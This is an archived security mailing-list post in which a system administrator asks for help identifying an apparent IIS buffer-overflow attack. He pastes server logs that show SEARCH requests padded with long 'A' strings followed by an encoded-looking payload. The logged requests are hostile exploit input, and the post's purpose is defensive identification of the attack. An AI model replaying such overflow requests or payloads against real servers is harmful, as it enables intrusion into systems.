[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <200404290634.AA205390158@transientimages.com>
From: root at transientimages.com (System Administrator)
Subject: Exploit Identification Request
Folks :
One of our external systems (W2k, fully patched all components -
sp4, sql sp4, mdac sp3, post hotfixes, etc) is being hit by what
appears to be a buffer overflow of IIS : 4096 bytes cycling in
what appears to be an attempt to execute code. The probe starts by
obtaining an index.asp page, and then drops a "SEARCH / 411 210
42" before dropping the "AAAAA<n>" string.
I've checked the SEARCH unicode against google (nothing) and k-
otic's current exploits (nada) and dsheild tables (nada).
Can anyone assist in idenfification of the exploit\overrun attempt?
Thanks,
Oliver
2004-04-28 21:12:38 x.x.88.247 GET /index.asp 200 0 189
Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) -
2004-04-28 21:12:38 x.x.88.247 SEARCH / 411 210 42 - -
2004-04-28 21:12:45 x.x.88.247
SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA???.??????????????????????????????????####??????????
rmomddddddisjhnegdddddddlohddplokdepnqlojldlloskjndiimrlimddddddrfs
mlgrpehggpdidjlfrjikljijljljskgkhjlipkgkjjgloqpidjndjjndfididjldddd
ddhdigssejlgslsskhfmlosljnddlopjlgpdelidloilspiglgpddhidikssijdhidi
kssijdlillipdkhdmloqpggpdidigssijdpssijedieijlohigploihflkldgqiiflo
kffddgsiggpmhmhenqdgpiggqodsoredgnqjkhdlpepodqdgqnhdrosegoeskirkinl
oinfhdgqqjjlodpholoinepdgqqlodhlodgpinoirimpgrlhfssssssniekddkpeskm
dnrlsomksqdsmlsrlndrrsprrdjdddgfddddddddddddhqinmddddgdddddddhddddd
dssssddddolddddddddddddddhddddddddddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddddddddrldddddddresondrddohdmpqfeoldehppqfei
hjljmkgfdkdkfjsjkkfjejqfdjgjejrjrjskhfdjfjifdkfkijrfdjmjrfd
2004-04-28 21:12:51 217.185.88.247
SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAA???.??????????????????????????????????####??????????
rmomddddddisjhnegdddddddlohddplokdepnqlojldlloskjndiimrlimddddddrfs
mlgrpehggpdidjlfrjikljijljljskgkhjlipkgkjjgloqpidjndjjndfididjldddd
ddhdigssejlgslsskhfmlosljnddlopjlgpdelidloilspiglgpddhidikssijdhidi
kssijdlillipdkhdmloqpggpdidigssijdpssijedieijlohigploihflkldgqiiflo
kffddgsiggpmhmhenqdgpiggqodsoredgnqjkhdlpepodqdgqnhdrosegoeskirkinl
oinfhdgqqjjlodpholoinepdgqqlodhlodgpinoirimpgrlhfssssssniekddkpeskm
dnrlsomksqdsmlsrlndrrsprrdjdddgfddddddddddddhqinmddddgdddddddhddddd
dssssddddolddddddddddddddhddddddddddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddddddddrldddddddresondrddohdmpqfeoldehppqfei
hjljmkgfdkdkfjsjkkfjejqfdjgjejrjrjskhfdjfjifdkfkijrfdjmjrf
2004-04-28 21:13:01 217.185.198.113 GET /index.asp 200 0 189
Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) -
2004-04-28 21:13:04 217.185.198.113 SEARCH / 411 210 42 - -
2004-04-28 21:13:27 217.185.198.113
SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA???.??????????????????????????????????####??????????
rmomddddddisjhnegdddddddlohddplokdepnqlojldlloskjndiimrlimddddddrfs
mlgrpehggpdidjlfrjikljijljljskgkhjlipkgkjjgloqpidjndjjndfididjldddd
ddhdigssejlgslsskhfmlosljnddlopjlgpdelidloilspiglgpddhidikssijdhidi
kssijdlillipdkhdmloqpggpdidigssijdpssijedieijlohigploihflkldgqiiflo
kffddgsiggpmhmhenqdgpiggqodsoredgnqjkhdlpepodqdgqnhdrosegoeskirkinl
oinfhdgqqjjlodpholoinepdgqqlodhlodgpinoirimpgrlhfssssssniekddkpeskm
dnrlsomksqdsmlsrlndrrsprrdjdddgfddddddddddddhqinmddddgdddddddhddddd
dssssddddolddddddddddddddhddddddddddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddddddddrldddddddresondrddohdmpqfeoldehppqfei
hjljmkgfdkdkfjsjkkfjejqfdjgjejrjrjskhfdjfjifdkfkijrfdjmjrf
Powered by blists - more mailing lists